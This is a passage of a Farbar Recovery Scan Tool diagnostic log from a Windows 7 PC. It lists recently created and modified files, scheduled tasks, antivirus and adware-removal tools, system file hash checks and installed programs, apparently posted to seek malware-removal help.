2014-03-13 09:03 - 2014-03-01 14:52 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-03-13 09:03 - 2014-03-01 14:51 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-03-13 09:03 - 2014-03-01 14:42 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-03-13 09:03 - 2014-03-01 14:40 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-03-13 09:03 - 2014-03-01 14:37 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-03-13 09:03 - 2014-03-01 14:33 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-03-13 09:03 - 2014-03-01 14:33 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-03-13 09:03 - 2014-03-01 14:32 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-03-13 09:03 - 2014-03-01 14:30 - 17074688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-03-13 09:03 - 2014-03-01 14:23 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-03-13 09:03 - 2014-03-01 14:17 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-03-13 09:03 - 2014-03-01 14:11 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-03-13 09:03 - 2014-03-01 14:02 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-03-13 09:03 - 2014-03-01 13:54 - 05768704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-03-13 09:03 - 2014-03-01 13:52 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-03-13 09:03 - 2014-03-01 13:51 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-03-13 09:03 - 2014-03-01 13:47 - 02168320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-03-13 09:03 - 2014-03-01 13:43 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-03-13 09:03 - 2014-03-01 13:43 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-03-13 09:03 - 2014-03-01 13:42 - 00627200 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-03-13 09:03 - 2014-03-01 13:40 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-03-13 09:03 - 2014-03-01 13:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-03-13 09:03 - 2014-03-01 13:37 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-03-13 09:03 - 2014-03-01 13:35 - 02041856 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-03-13 09:03 - 2014-03-01 13:18 - 13051904 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-03-13 09:03 - 2014-03-01 13:16 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-03-13 09:03 - 2014-03-01 13:14 - 04244480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-03-13 09:03 - 2014-03-01 13:10 - 02334208 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-03-13 09:03 - 2014-03-01 13:03 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-03-13 09:03 - 2014-03-01 13:00 - 01964032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-03-13 09:03 - 2014-03-01 12:57 - 11266048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-03-13 09:03 - 2014-03-01 12:38 - 01393664 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-03-13 09:03 - 2014-03-01 12:32 - 01820160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-03-13 09:03 - 2014-03-01 12:27 - 01156096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-03-13 09:03 - 2014-03-01 12:25 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-03-13 09:03 - 2014-03-01 12:25 - 00703488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-03-13 09:03 - 2014-02-07 11:23 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-03-13 09:03 - 2014-01-29 12:32 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2014-03-13 09:03 - 2014-01-29 12:06 - 00381440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2014-03-13 09:03 - 2014-01-28 12:32 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2014-03-13 08:58 - 2014-02-04 12:32 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-03-13 08:58 - 2014-02-04 12:32 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-03-13 08:58 - 2014-02-04 12:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2014-03-13 08:58 - 2014-02-04 12:04 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-03-10 10:00 - 2014-03-10 10:00 - 00002762 _____ () C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
2014-03-10 09:02 - 2014-03-10 09:02 - 00001119 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-10 09:02 - 2014-03-10 09:02 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\Malwarebytes
2014-03-10 09:00 - 2014-03-10 09:00 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\Paulette\Downloads\mbam-setup-1.75.0.1300.exe
2014-03-10 08:56 - 2014-03-10 08:56 - 00000000 ____D () C:\Qoobox
2014-03-10 08:55 - 2014-03-10 08:55 - 00000000 ____D () C:\Windows\erdnt
2014-03-10 08:00 - 2014-03-10 13:20 - 00000000 ____D () C:\Users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-10 07:59 - 2014-03-10 07:59 - 01295200 _____ (LogMeIn, Inc.) C:\Users\Paulette\Downloads\Support-LogMeInRescue.exe
2014-03-09 13:34 - 2014-03-09 13:34 - 00003694 _____ () C:\Windows\System32\Tasks\Adobe online update program
2014-03-09 13:27 - 2014-03-09 13:27 - 00002235 _____ () C:\Users\Public\Desktop\AVG 1-Click Maintenance.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00002209 _____ () C:\Users\Public\Desktop\AVG PC TuneUp 2014.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVG
2014-03-09 13:27 - 2013-12-18 09:38 - 00040248 _____ (AVG) C:\Windows\system32\TURegOpt.exe
2014-03-09 13:27 - 2013-12-18 09:38 - 00029496 _____ (AVG) C:\Windows\system32\authuitu.dll
2014-03-09 13:27 - 2013-12-18 09:38 - 00025400 _____ (AVG) C:\Windows\SysWOW64\authuitu.dll
2014-03-09 13:25 - 2014-03-09 13:33 - 00000000 __SHD () C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-03-09 13:25 - 2014-03-09 13:29 - 00000000 ____D () C:\ProgramData\AVG
2014-03-09 13:22 - 2014-03-09 13:24 - 78353832 _____ (AVG) C:\Users\Paulette\Downloads\avg_tuht_stf_all_2014_295.exe
2014-02-28 10:28 - 2014-03-16 07:29 - 00000000 ____D () C:\Program Files (x86)\MediaViewV1
2014-02-25 09:17 - 2014-02-25 09:17 - 00000000 ____D () C:\Program Files (x86)\MediaViewerV1

==================== One Month Modified Files and Folders =======

2014-03-19 00:42 - 2014-03-19 00:41 - 00015656 _____ () C:\Users\Paulette\Desktop\FRST.txt
2014-03-19 00:41 - 2014-03-19 00:41 - 00000000 ____D () C:\FRST
2014-03-19 00:40 - 2014-03-19 00:39 - 02157056 _____ (Farbar) C:\Users\Paulette\Desktop\FRST64.exe
2014-03-19 00:37 - 2014-03-19 00:37 - 01145856 _____ (Farbar) C:\Users\Paulette\Desktop\FRST.exe
2014-03-19 00:30 - 2009-07-14 14:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-03-19 00:30 - 2009-07-14 14:45 - 00015792 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-03-19 00:26 - 2014-01-20 17:04 - 01958934 _____ () C:\Windows\WindowsUpdate.log
2014-03-19 00:23 - 2014-03-17 11:12 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-19 00:23 - 2014-01-20 19:40 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-03-19 00:22 - 2014-03-17 11:40 - 00000224 _____ () C:\Windows\setupact.log
2014-03-19 00:22 - 2009-07-14 15:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-03-19 00:00 - 2014-01-20 19:40 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-03-18 23:54 - 2014-01-20 17:22 - 00000000 ____D () C:\Users\Paulette\AppData\Local\VirtualStore
2014-03-18 23:36 - 2014-01-20 19:52 - 00000000 ____D () C:\ProgramData\MFAData
2014-03-18 23:32 - 2014-03-16 15:21 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-03-17 13:50 - 2014-01-20 20:10 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\SoftGrid Client
2014-03-17 13:25 - 2014-03-16 15:22 - 00002192 _____ () C:\Users\Public\Desktop\avast! Premier.lnk
2014-03-17 13:21 - 2014-03-17 13:21 - 00001984 _____ () C:\Users\Paulette\Desktop\JRT.txt
2014-03-17 13:17 - 2014-02-06 19:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-03-17 13:09 - 2014-03-17 13:09 - 00000000 ____D () C:\Windows\ERUNT
2014-03-17 13:02 - 2014-03-17 13:02 - 01037734 _____ (Thisisu) C:\Users\Paulette\Downloads\JRT.exe
2014-03-17 12:43 - 2014-03-17 12:39 - 00000000 ____D () C:\AdwCleaner
2014-03-17 12:39 - 2014-03-17 12:37 - 01950720 _____ () C:\Users\Paulette\Downloads\AdwCleaner.exe
2014-03-17 11:40 - 2014-03-17 11:40 - 00028918 _____ () C:\Windows\PFRO.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00000000 _____ () C:\Windows\setuperr.log
2014-03-17 11:40 - 2014-03-17 11:13 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:40 - 2014-03-17 11:12 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:40 - 2014-03-17 11:12 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:37 - 2014-02-15 16:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-03-17 11:37 - 2014-01-27 10:39 - 00000000 ____D () C:\Program Files (x86)\ABBYY FineReader 9.0 Sprint
2014-03-17 11:37 - 2014-01-20 19:44 - 00000000 ____D () C:\Program Files (x86)\Mozilla Thunderbird
2014-03-17 11:37 - 2014-01-20 19:11 - 00000000 ____D () C:\Users\Paulette\Documents\PcSetup
2014-03-17 11:37 - 2010-01-25 01:13 - 00000000 ____D () C:\Windows\Panther
2014-03-17 11:37 - 2010-01-24 06:54 - 00000000 ____D () C:\Program Files (x86)\HP Games
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
2014-03-16 15:22 - 2014-03-16 15:22 - 00440672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswndisflt.sys
2014-03-16 15:22 - 2014-03-16 15:22 - 00002018 _____ () C:\Users\Public\Desktop\avast! SafeZone.lnk
2014-03-16 15:19 - 2014-03-16 15:19 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVAST Software
2014-03-16 09:06 - 2014-03-16 09:06 - 01038072 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00421704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00334136 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-03-16 09:06 - 2014-03-16 09:06 - 00207904 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00080184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00078648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-03-16 09:06 - 2014-03-16 09:06 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-03-16 09:05 - 2014-03-16 09:05 - 00000000 ____D () C:\Program Files\AVAST Software
2014-03-16 09:02 - 2014-03-16 09:02 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-03-16 08:59 - 2014-03-16 08:49 - 123721288 _____ (AVAST Software) C:\Users\Paulette\Downloads\avast_premier_antivirus_setup.exe
2014-03-16 08:49 - 2014-03-16 08:49 - 00001727 _____ () C:\Users\Paulette\Downloads\License(1).avastlic
2014-03-16 07:29 - 2014-02-28 10:28 - 00000000 ____D () C:\Program Files (x86)\MediaViewV1
2014-03-16 07:29 - 2014-01-20 19:53 - 00000000 ____D () C:\ProgramData\AVG2014
2014-03-13 19:41 - 2009-07-14 14:45 - 00430960 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-03-13 19:40 - 2014-01-20 19:41 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-03-13 19:40 - 2014-01-20 19:41 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-03-13 07:17 - 2014-02-06 19:45 - 00692616 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-03-13 07:17 - 2014-02-06 19:45 - 00071048 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-03-13 07:17 - 2014-02-06 19:45 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-03-10 13:20 - 2014-03-10 08:00 - 00000000 ____D () C:\Users\Paulette\AppData\Local\LogMeIn Rescue Applet
2014-03-10 10:27 - 2014-01-20 19:11 - 05187267 _____ (Swearware) C:\Users\Paulette\Downloads\ComboFix.exe
2014-03-10 10:00 - 2014-03-10 10:00 - 00002762 _____ () C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
2014-03-10 09:02 - 2014-03-10 09:02 - 00001119 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-10 09:02 - 2014-03-10 09:02 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\Malwarebytes
2014-03-10 09:02 - 2014-01-20 19:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-03-10 09:00 - 2014-03-10 09:00 - 10285040 _____ (Malwarebytes Corporation ) C:\Users\Paulette\Downloads\mbam-setup-1.75.0.1300.exe
2014-03-10 08:56 - 2014-03-10 08:56 - 00000000 ____D () C:\Qoobox
2014-03-10 08:55 - 2014-03-10 08:55 - 00000000 ____D () C:\Windows\erdnt
2014-03-10 07:59 - 2014-03-10 07:59 - 01295200 _____ (LogMeIn, Inc.) C:\Users\Paulette\Downloads\Support-LogMeInRescue.exe
2014-03-09 13:34 - 2014-03-09 13:34 - 00003694 _____ () C:\Windows\System32\Tasks\Adobe online update program
2014-03-09 13:33 - 2014-03-09 13:25 - 00000000 __SHD () C:\ProgramData\{01BD4FC9-2F86-4706-A62E-774BB7E9D308}
2014-03-09 13:33 - 2014-02-06 07:20 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\HpUpdate
2014-03-09 13:33 - 2010-01-24 06:43 - 00000000 ____D () C:\ProgramData\{44AFD825-9603-4521-9447-A6E1C5CA2F3D}
2014-03-09 13:33 - 2010-01-24 06:40 - 00000000 ____D () C:\ProgramData\{B3C2C1CD-6B77-4A96-B670-F734AC2A1CBC}
2014-03-09 13:33 - 2010-01-24 06:25 - 00000000 __HDC () C:\ProgramData\{B12D13C3-76FD-479D-AD99-8C6F18156BC9}
2014-03-09 13:29 - 2014-03-09 13:25 - 00000000 ____D () C:\ProgramData\AVG
2014-03-09 13:27 - 2014-03-09 13:27 - 00002235 _____ () C:\Users\Public\Desktop\AVG 1-Click Maintenance.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00002209 _____ () C:\Users\Public\Desktop\AVG PC TuneUp 2014.lnk
2014-03-09 13:27 - 2014-03-09 13:27 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVG
2014-03-09 13:26 - 2014-01-20 19:52 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-03-09 13:24 - 2014-03-09 13:22 - 78353832 _____ (AVG) C:\Users\Paulette\Downloads\avg_tuht_stf_all_2014_295.exe
2014-03-01 16:05 - 2014-03-13 09:03 - 23133696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-03-01 15:17 - 2014-03-13 09:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-03-01 15:16 - 2014-03-13 09:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-03-01 14:58 - 2014-03-13 09:03 - 02765824 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-03-01 14:52 - 2014-03-13 09:03 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-03-01 14:51 - 2014-03-13 09:03 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-03-01 14:42 - 2014-03-13 09:03 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-03-01 14:40 - 2014-03-13 09:03 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-03-01 14:37 - 2014-03-13 09:03 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-03-01 14:33 - 2014-03-13 09:03 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-03-01 14:33 - 2014-03-13 09:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-03-01 14:32 - 2014-03-13 09:03 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-03-01 14:30 - 2014-03-13 09:03 - 17074688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-03-01 14:23 - 2014-03-13 09:03 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-03-01 14:17 - 2014-03-13 09:03 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-03-01 14:11 - 2014-03-13 09:03 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-03-01 14:02 - 2014-03-13 09:03 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-03-01 13:54 - 2014-03-13 09:03 - 05768704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-03-01 13:52 - 2014-03-13 09:03 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-03-01 13:51 - 2014-03-13 09:03 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-03-01 13:47 - 2014-03-13 09:03 - 02168320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-03-01 13:43 - 2014-03-13 09:03 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-03-01 13:43 - 2014-03-13 09:03 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-03-01 13:42 - 2014-03-13 09:03 - 00627200 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-03-01 13:40 - 2014-03-13 09:03 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-03-01 13:38 - 2014-03-13 09:03 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-03-01 13:37 - 2014-03-13 09:03 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-03-01 13:35 - 2014-03-13 09:03 - 02041856 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-03-01 13:18 - 2014-03-13 09:03 - 13051904 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-03-01 13:16 - 2014-03-13 09:03 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-03-01 13:14 - 2014-03-13 09:03 - 04244480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-03-01 13:10 - 2014-03-13 09:03 - 02334208 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-03-01 13:03 - 2014-03-13 09:03 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-03-01 13:00 - 2014-03-13 09:03 - 01964032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-03-01 12:57 - 2014-03-13 09:03 - 11266048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-03-01 12:38 - 2014-03-13 09:03 - 01393664 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-03-01 12:32 - 2014-03-13 09:03 - 01820160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-03-01 12:27 - 2014-03-13 09:03 - 01156096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-03-01 12:25 - 2014-03-13 09:03 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-03-01 12:25 - 2014-03-13 09:03 - 00703488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-02-28 11:06 - 2014-01-20 19:47 - 00000000 ____D () C:\Users\Paulette\AppData\Local\Paint.NET
2014-02-28 10:28 - 2014-02-11 13:05 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-02-25 09:17 - 2014-02-25 09:17 - 00000000 ____D () C:\Program Files (x86)\MediaViewerV1
2014-02-20 20:18 - 2009-07-14 15:13 - 00782940 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-02-20 19:26 - 2009-07-14 13:20 - 00000000 ____D () C:\Windows\rescache
2014-02-20 14:34 - 2014-02-15 16:18 - 00000000 ____D () C:\ProgramData\PsdChheckeer
2014-02-20 14:34 - 2014-02-15 16:18 - 00000000 ____D () C:\ProgramData\deeal4meu
2014-02-19 17:35 - 2014-01-20 19:39 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-02-19 15:26 - 2014-01-20 21:21 - 00000000 ____D () C:\Windows\system32\MRT
2014-02-19 15:23 - 2014-01-20 21:20 - 88567024 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Some content of TEMP:
====================
C:\Users\Paulette\AppData\Local\Temp\Quarantine.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2014-03-16 18:36

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-03-2014
Ran by Paulette at 2014-03-19 00:42:28
Running from C:\Users\Paulette\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AV: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Enabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}

==================== Installed Programs ======================

ABBYY FineReader 9.0 Sprint (HKLM-x32\...\ABBYY FineReader 9.0 Sprint) (Version: 9.01.506.5829 - ABBYY)
ABBYY FineReader 9.0 Sprint (x32 Version: 9.01.506.5829 - ABBYY) Hidden
Activation Assistant for the 2007 Microsoft Office suites (x32 Version: 1.0.1 - Microsoft Corporation) Hidden
ActiveCheck component for HP Active Support Library (x32 Version: 3.0.0.2 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 4.0.0.1390 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.7.148 - Adobe Systems, Inc.)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Catalyst Install Manager (HKLM\...\{5A569CBA-9BE4-EAB0-9B43-468CEA2323B7}) (Version: 3.0.741.0 - ATI Technologies, Inc.)
avast! Premier (HKLM-x32\...\Avast) (Version: 9.0.2013 - Avast Software)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4259 - AVG Technologies)
AVG 2014 (Version: 14.0.3722 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4259 - AVG Technologies) Hidden
AVG PC TuneUp 2014 (en-US) (x32 Version: 14.0.1001.295 - AVG) Hidden
AVG PC TuneUp 2014 (HKLM-x32\...\AVG PC TuneUp) (Version: 14.0.1001.295 - AVG)
AVG PC TuneUp 2014 (x32 Version: 14.0.1001.295 - AVG) Hidden
Bing Bar (HKLM-x32\...\{B4089055-D468-45A4-A6BA-5A138DD715FC}) (Version: 7.0.850.0 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
